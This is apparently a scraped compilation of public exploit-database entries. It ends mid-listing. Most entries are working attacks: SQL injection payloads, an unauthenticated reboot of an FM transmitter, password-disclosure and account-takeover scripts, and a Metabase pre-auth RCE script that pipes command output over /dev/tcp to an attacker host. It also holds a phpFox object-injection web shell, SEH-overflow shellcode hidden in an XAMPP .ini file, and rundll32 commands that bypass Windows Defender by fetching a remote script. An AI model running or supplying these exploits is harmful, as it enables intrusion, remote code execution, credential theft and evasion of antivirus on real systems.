ISHACK AI BOT

# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection # Date: 02/10/2023 # Exploit Author: Alperen Yozgat # Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/ # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479 # Version: 1.0 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 ## Description ## On the download-pass.php page, the searchdata parameter in the search function is vulnerable to SQL injection vulnerability. ## Proof of Concept ## # After sending the payload, the response time will increase to at least 5 seconds. # Payload: 1'or+sleep(5)--+- POST /rpms/download-pass.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b searchdata=1'or+sleep(5)--+-&search=

# Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection # Date: 03/10/2023 # Exploit Author: Alperen Yozgat # Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql # Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17826 # Version: 1.0 # Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30 ## Description ## On the book-nurse.php page, the bookid parameter is vulnerable to SQL Injection vulnerability. ## Proof of Concept ## # After sending the payload, the response time will increase to at least 5 seconds. # Payload: 1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY POST /onhs/book-nurse.php?bookid=1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 140 Cookie: PHPSESSID=0ab508c4aa5fdb6c55abb909e5cbce09 contactname=test&contphonenum=1111111&contemail=test%40test.com&fromdate=2023-10-11&todate=2023-10-18&timeduration=1&patientdesc=3&submit=

# Exploit Title: Splunk 9.0.4 - Information Disclosure # Date: 2023-09-18 # Exploit Author: Parsa rezaie khiabanloo # Vendor Homepage: https://www.splunk.com/ # Version: 9.0.4 # Tested on: Windows OS # Splunk through 9.0.4 allows information disclosure by appending # /__raw/services/server/info/server-info?output_mode=json to a query, # as demonstrated by discovering a license key and other information. # PoC : https://127.0.0.1:8000/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json

VIMESA VHF/FM Transmitter Blue Plus 9.7.1 (doreboot) Remote Denial Of Service Vendor: Video Medios, S.A. (VIMESA) Product web page: https://www.vimesa.es Affected version: img:v9.7.1 Html:v2.4 RS485:v2.5 Summary: The transmitter Blue Plus is designed with all the latest technologies, such as high efficiency using the latest generation LDMOS transistor and high efficiency power supplies. We used a modern interface and performance using a color display with touch screen, with easy management software and easy to use. The transmitter is equipped with all audio input including Audio IP for a complete audio interface. The VHF/FM transmitter 30-1000 is intended for the transmission of frequency modulated broadcasts in mono or stereo. It work with broadband characteristics in the VHF frequency range from 87.5-108 MHz and can be operated with any frequency in this range withoug alignment. The transmitter output power is variable between 10 and 110% of the nominal Power. It is available with different remote control ports. It can store up to six broadcast programs including program specific parameters such as frequency, RF output power, modulation type, RDS, AF level and deviation limiting. The transmitter is equipped with a LAN interface that permits the complete remote control of the transmitter operation via SNMP or Web Server. Desc: The device is suffering from a Denial of Service (DoS) vulnerability. An unauthenticated attacker can issue an unauthorized HTTP GET request to the unprotected endpoint 'doreboot' and restart the transmitter operations. Tested on: lighttpd/1.4.32 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2023-5798 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5798.php 22.07.2023 -- $ curl -v "http://192.168.3.11:5007/doreboot" * Trying 192.168.3.11:5007... * Connected to 192.168.3.11 (192.168.3.11) port 5007 (#0) > GET /doreboot HTTP/1.1 > Host: 192.168.3.11:5007 > User-Agent: curl/8.0.1 > Accept: */* > * Recv failure: Connection was reset * Closing connection 0 curl: (56) Recv failure: Connection was reset

# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/ad-manager/ # Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492 # Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md # Version: ADManager Plus Build < 7183 # Tested against: Build 7180 # CVE: CVE-2023-31492 import argparse import requests import urllib3 import sys """ The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. When deleted user accounts are restored, defined password is set to the user accounts. Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def getPass(target, auth, user, password): with requests.Session() as s: if auth.lower() == 'admanager': auth = 'ADManager Plus Authentication' data = { "is_admp_pass_encrypted": "false", "j_username": user, "j_password": password, "domainName": auth, "AUTHRULE_NAME": "ADAuthenticator" } # Login url = target + 'j_security_check?LogoutFromSSO=true' headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/x-www-form-urlencoded" } req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) if 'Cookie' in req.request.headers: print('[+] Authentication successful!') elif req.status_code == 200: print('[-] Invalid login name/password!') sys.exit(0) else: print('[-] Something went wrong!') sys.exit(1) # Fetching recovery password for i in range(1, 6): print('[*] Trying to fetch recovery password for domainId: %s !' % i) passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D' passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False) if passReq.content: print(passReq.content) def main(): arg = get_args() target = arg.target auth = arg.auth user = arg.user password = arg.password getPass(target, auth, user, password) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1") parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') args = parser.parse_args() return args main()

# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03 # Exploit Author: OR4NG.M4N # Category : webapps # CVE : CVE-2023-38965 Python p0c : import argparse import requests import time parser = argparse.ArgumentParser(description='Send a POST request to the target server') parser.add_argument('-url', help='URL of the target', required=True) parser.add_argument('-user', help='Username', required=True) parser.add_argument('-password', help='Password', required=True) args = parser.parse_args() url = args.url + '/classes/Users.php?f=save' data = { 'id': '1', 'firstname': 'or4ng', 'middlename': '', 'lastname': 'Admin', 'username': args.user, 'password': args.password } response = requests.post(url, data) if b"1" in response.content: print("Exploit ..") time.sleep(1) print("User :" + args.user + "\nPassword :" + args.password) else: print("Exploit Failed..")

# Exploit Title: SISQUALWFM 7.1.319.103 Host Header Injection # Discovered Date: 17/03/2023 # Reported Date: 17/03/2023 # Resolved Date: 13/10/2023 # Exploit Author: Omer Shaik (unknown_exploit) # Vendor Homepage: https://www.sisqualwfm.com # Version: 7.1.319.103 # Tested on: SISQUAL WFM 7.1.319.103 # Affected Version: sisqualWFM - 7.1.319.103 # Fixed Version: sisqualWFM - 7.1.319.111 # CVE : CVE-2023-36085 # CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N # Category: Web Apps A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header. **************************************************************************************************** Orignal Request **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: sisqualwfm.cloud Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Orignal Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Date: Wed, 22 Mar 2023 13:22:10 GMT Content-Length: 0 **************************************************************************************************** ██████╗ ██████╗ ██████╗ ██╔══██╗██╔═══██╗██╔════╝ ██████╔╝██║ ██║██║ ██╔═══╝ ██║ ██║██║ ██║ ╚██████╔╝╚██████╗ ╚═╝ ╚═════╝ ╚═════╝ **************************************************************************************************** Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy) **************************************************************************************************** GET /sisqualIdentityServer/core/login HTTP/2 Host: evil.com Cookie:<cookie> Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 **************************************************************************************************** Response **************************************************************************************************** HTTP/2 302 Found Cache-Control: no-store, no-cache, must-revalidate Location: https://evil.com/sisqualIdentityServer/core/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Length: 0 **************************************************************************************************** Method of Attack **************************************************************************************************** curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv ****************************************************************************************************

# Exploit Title: DS Wireless Communication Remote Code Execution # Date: 11 Oct 2023 # Exploit Author: MikeIsAStar # Vendor Homepage: https://www.nintendo.com # Version: Unknown # Tested on: Wii # CVE: CVE-2023-45887 """This code will inject arbitrary code into a client's game. You are fully responsible for all activity that occurs while using this code. The author of this code can not be held liable to you or to anyone else as a result of damages caused by the usage of this code. """ import re import sys try: import pydivert except ModuleNotFoundError: sys.exit("The 'pydivert' module is not installed !") # Variables LR_SAVE = b'\x41\x41\x41\x41' assert len(LR_SAVE) == 0x04 PADDING = b'MikeStar' assert len(PADDING) > 0x00 # Constants DWC_MATCH_COMMAND_INVALID = b'\xFE' PADDING_LENGTH = 0x23C FINAL_KEY = b'\\final\\' WINDIVERT_FILTER = 'outbound and tcp and tcp.PayloadLength > 0' def try_modify_payload(payload): message_pattern = rb'\\msg\\GPCM([1-9][0-9]?)vMAT' message = re.search(message_pattern, payload) if not message: return None payload = payload[:message.end()] payload += DWC_MATCH_COMMAND_INVALID payload += (PADDING * (PADDING_LENGTH // len(PADDING) + 1))[:PADDING_LENGTH] payload += LR_SAVE payload += FINAL_KEY return payload def main(): try: with pydivert.WinDivert(WINDIVERT_FILTER) as packet_buffer: for packet in packet_buffer: payload = try_modify_payload(packet.payload) if payload is not None: print('Modified a GPCM message !') packet.payload = payload packet_buffer.send(packet) except KeyboardInterrupt: pass except PermissionError: sys.exit('This program must be run with administrator privileges !') if __name__ == '__main__': main()

# Exploit Title: metabase 0.46.6 - Pre-Auth Remote Code Execution # Google Dork: N/A # Date: 13-10-2023 # Exploit Author: Musyoka Ian # Vendor Homepage: https://www.metabase.com/ # Software Link: https://www.metabase.com/ # Version: metabase 0.46.6 # Tested on: Ubuntu 22.04, metabase 0.46.6 # CVE : CVE-2023-38646 #!/usr/bin/env python3 import socket from http.server import HTTPServer, BaseHTTPRequestHandler from typing import Any import requests from socketserver import ThreadingMixIn import threading import sys import argparse from termcolor import colored from cmd import Cmd import re from base64 import b64decode class Termial(Cmd): prompt = "metabase_shell > " def default(self,args): shell(args) class Handler(BaseHTTPRequestHandler): def do_GET(self): global success if self.path == "/exploitable": self.send_response(200) self.end_headers() self.wfile.write(f"#!/bin/bash\n$@ | base64 -w 0 > /dev/tcp/{argument.lhost}/{argument.lport}".encode()) success = True else: print(self.path) #sys.exit(1) def log_message(self, format: str, *args: Any) -> None: return None class Server(HTTPServer): pass def run(): global httpserver httpserver = Server(("0.0.0.0", argument.sport), Handler) httpserver.serve_forever() def exploit(): global success, setup_token print(colored("[*] Retriving setup token", "green")) setuptoken_request = requests.get(f"{argument.url}/api/session/properties") setup_token = re.search('"setup-token":"(.*?)"', setuptoken_request.text, re.DOTALL).group(1) print(colored(f"[+] Setup token: {setup_token}", "green")) print(colored("[*] Tesing if metabase is vulnerable", "green")) payload = { "token": setup_token, "details": { "is_on_demand": False, "is_full_sync": False, "is_sample": False, "cache_ttl": None, "refingerprint": False, "auto_run_queries": True, "schedules": {}, "details": { "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('http://{argument.lhost}:{argument.sport}/exploitable').openConnection().getContentLength()\n$$--=x\\;", "advanced-options": False, "ssl": True }, "name": "an-sec-research-musyoka", "engine": "h2" } } timer = 0 print(colored(f"[+] Starting http server on port {argument.sport}", "blue")) thread = threading.Thread(target=run, ) thread.start() while timer != 120: test = requests.post(f"{argument.url}/api/setup/validate", json=payload) if success == True : print(colored("[+] Metabase version seems exploitable", "green")) break elif timer == 120: print(colored("[-] Service does not seem exploitable exiting ......", "red")) sys.exit(1) print(colored("[+] Exploiting the server", "red")) terminal = Termial() terminal.cmdloop() def shell(command): global setup_token, payload2 payload2 = { "token": setup_token, "details": { "is_on_demand": False, "is_full_sync": False, "is_sample": False, "cache_ttl": None, "refingerprint": False, "auto_run_queries": True, "schedules": {}, "details": { "db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl {argument.lhost}:{argument.sport}/exploitable -o /dev/shm/exec.sh')\n$$--=x", "advanced-options": False, "ssl": True }, "name": "an-sec-research-team", "engine": "h2" } } output = requests.post(f"{argument.url}/api/setup/validate", json=payload2) bind_thread = threading.Thread(target=bind_function, ) bind_thread.start() #updating the payload payload2["details"]["details"]["db"] = f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /dev/shm/exec.sh {command}')\n$$--=x" requests.post(f"{argument.url}/api/setup/validate", json=payload2) #print(output.text) def bind_function(): try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind(("0.0.0.0", argument.lport)) sock.listen() conn, addr = sock.accept() data = conn.recv(10240).decode("ascii") print(f"\n{(b64decode(data)).decode()}") except Exception as ex: print(colored(f"[-] Error: {ex}", "red")) pass if __name__ == "__main__": print(colored("[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]", "magenta")) args = argparse.ArgumentParser(description="Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]") args.add_argument("-l", "--lhost", metavar="", help="Attacker's bind IP Address", type=str, required=True) args.add_argument("-p", "--lport", metavar="", help="Attacker's bind port", type=int, required=True) args.add_argument("-P", "--sport", metavar="", help="HTTP Server bind port", type=int, required=True) args.add_argument("-u", "--url", metavar="", help="Metabase web application URL", type=str, required=True) argument = args.parse_args() if argument.url.endswith("/"): argument.url = argument.url[:-1] success = False exploit()

<?php /* -------------------------------------------------------------- phpFox <= 4.8.13 (redirect) PHP Object Injection Vulnerability -------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://www.phpfox.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: User input passed through the "url" request parameter to the /core/redirect route is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as executing arbitrary PHP code. [-] Original Advisory: https://karmainsecurity.com/KIS-2023-12 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[+] cURL extension required!\n"); print "+------------------------------------------------------------------+\n"; print "| phpFox <= 4.8.13 (redirect) PHP Object Injection Exploit by EgiX |\n"; print "+------------------------------------------------------------------+\n"; if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n"); function encode($string) { $string = addslashes(gzcompress($string, 9)); return urlencode(strtr(base64_encode($string), '+/=', '-_,')); } class Phpfox_Request { private $_sName = "EgiX"; private $_sPluginRequestGet = "print '_____'; passthru(base64_decode(\$_SERVER['HTTP_CMD'])); print '_____'; die;"; } class Core_Objectify { private $__toString; function __construct($callback) { $this->__toString = $callback; } } print "\n[+] Launching shell on {$argv[1]}\n"; $popChain = serialize(new Core_Objectify([new Phpfox_Request, "get"])); $popChain = str_replace('Core_Objectify', 'Core\Objectify', $popChain); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "{$argv[1]}index.php/core/redirect"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, "url=".encode($popChain)); while(1) { print "\nphpFox-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".base64_encode($cmd)]); preg_match("/_____(.*)_____/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); }

# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH) # Date: 2023-10-26 # Author: Talson (@Ripp3rdoc) # Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe # Version: 3.3.0 # Tested on: Windows 11 # CVE-2023-46517 ########################################################## # _________ _______ _ _______ _______ _ # # \__ __/( ___ )( \ ( ____ \( ___ )( ( /| # # ) ( | ( ) || ( | ( \/| ( ) || \ ( | # # | | | (___) || | | (_____ | | | || \ | | # # | | | ___ || | (_____ )| | | || (\ \) | # # | | | ( ) || | ) || | | || | \ | # # | | | ) ( || (____/\/\____) || (___) || ) \ | # # )_( |/ \|(_______/\_______)(_______)|/ )_) # # # ########################################################## # Proof-of-Concept Steps to Reproduce : # 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini" # 2.- Open the application (xampp-control.exe) # 3.- Click on the "admin" button in front of Apache service. # 4.- Profit # Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/ # Greetingz to EMU TEAM (¬‿¬)⩙ from pwn import * import shutil import os.path buffer = "\x41" * 268 # 268 bytes to fill the buffer nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding) seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ; padd = "\x71" * 0x55 # padding eax_align = "\x47" # venetian pad/align eax_align += "\x51" # push ecx eax_align += "\x71" # venetian pad/align eax_align += "\x58" # pop eax -> eax = 0019e1a0 eax_align += "\x71" # venetian pad/align eax_align += "\x05\x24\x11" # add eax,0x11002300 eax_align += "\x71" # venetian pad/align eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC eax_align += "\x71" # venetian pad/align eax_align += "\x50" # push eax eax_align += "\x71" # pad to align the following ret eax_align += "\xc3"; # ret into eax? # msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin # Payload size: 512 bytes shellcode = ( "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1" "AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx" "Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk" "myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML" "JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57" "KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA" ) shellcode = buffer + nseh + seh + eax_align + padd + shellcode check_file = os.path.isfile("c:\\xampp\\xampp-control.ini") if check_file: print("[!] Backup file found. Generating the POC file...") pass else: # create backup try: shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak") print("[+] Creating backup for xampp-control.ini...") print("[+] Backup file created!") except Exception as e: print("[!] Failed creating a backup for xampp-control.ini: ", e) try: # Create the new file with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file: file.write(f"""[Common] Edition= Editor= Browser={shellcode} Debug=0 Debuglevel=0 Language=en TomcatVisible=1 Minimized=0 [LogSettings] Font=Arial FontSize=10 [WindowSettings] Left=-1 Top=-1 Width=682 Height=441 [Autostart] Apache=0 MySQL=0 FileZilla=0 Mercury=0 Tomcat=0 [Checks] CheckRuntimes=1 CheckDefaultPorts=1 [ModuleNames] Apache=Apache MySQL=MySQL Mercury=Mercury Tomcat=Tomcat [EnableModules] Apache=1 MySQL=1 FileZilla=1 Mercury=1 Tomcat=1 [EnableServices] Apache=1 MySQL=1 FileZilla=1 Tomcat=1 [BinaryNames] Apache=httpd.exe MySQL=mysqld.exe FileZilla=filezillaserver.exe FileZillaAdmin=filezilla server interface.exe Mercury=mercury.exe Tomcat=tomcat8.exe [ServiceNames] Apache=Apache2.4 MySQL=mysql FileZilla=FileZillaServer Tomcat=Tomcat [ServicePorts] Apache=80 ApacheSSL=443 MySQL=3306 FileZilla=21 FileZill=14147 Mercury1=25 Mercury2=79 Mercury3=105 Mercury4=106 Mercury5=110 Mercury6=143 Mercury7=2224 TomcatHTTP=8080 TomcatAJP=8009 Tomcat=8005 [UserConfigs] Apache= MySQL= FileZilla= Mercury= Tomcat= [UserLogs] Apache= MySQL= FileZilla= Mercury= Tomcat= """) print("[+] Created the POC!") except Exception as e: print("[!] Failed creating the POC xampp-control.ini: ", e)

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Detection Mitigation Bypass Backdoor:JS/Relvelshe.A [CVE Reference] N/A [Security Issue] Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated. However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post. [References] https://twitter.com/hyp3rlinx/status/1480657623947091968 [Exploit/POC] 1) python -m http.server 80 2) Open command prompt as Administrator 3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp") Create file and host on server, this is contents of the "yo.tmp" file. <?xml version="1.0"?> <component> <script> try{ <![CDATA[ var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229"; var str = ''; for (var n = 0; n < hex.length; n += 2) { str += String.fromCharCode(parseInt(hex.substr(n, 2), 16)); } eval(str) ]]> }catch(e){ eval(str) } </script> </component> [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024: Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.microsoft.com [Product] Windows Defender [Vulnerability Type] Windows Defender VBScript Detection Mitigation Bypass TrojanWin32Powessere.G [CVE Reference] N/A [Security Issue] Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine. Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with an "Access is denied" message. Trojan:Win32/Powessere.G Category: Trojan This program is dangerous and executes commands from an attacker. However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection. Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing. E.g. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) [References] https://twitter.com/hyp3rlinx/status/1759260962761150468 https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt https://lolbas-project.github.io/lolbas/Binaries/Rundll32/ [Exploit/POC] Open command prompt as Administrator C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) Access is denied. C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0) We win! [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: February 18, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

# Exploit Title: Employee Management System v1 - 'email' SQL Injection # Google Dork: N/A # Application: Employee Management System # Date: 19.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html # Version: N/A # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information. ## Proof of Concept (PoC): An example attacker could input the following into the email field instead of a valid email address: In this case, the SQL query would look like: SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active' As "1=1" is always true, the query would return positive results, allowing the attacker to log in. ## Vulnerable code section: ==================================================== employee/Admin/login.php <?php session_start(); error_reporting(1); include('../connect.php'); //Get website details $sql_website = "select * from website_setting"; $result_website = $conn->query($sql_website); $row_website = mysqli_fetch_array($result_website); if(isset($_POST['btnlogin'])){ //Get 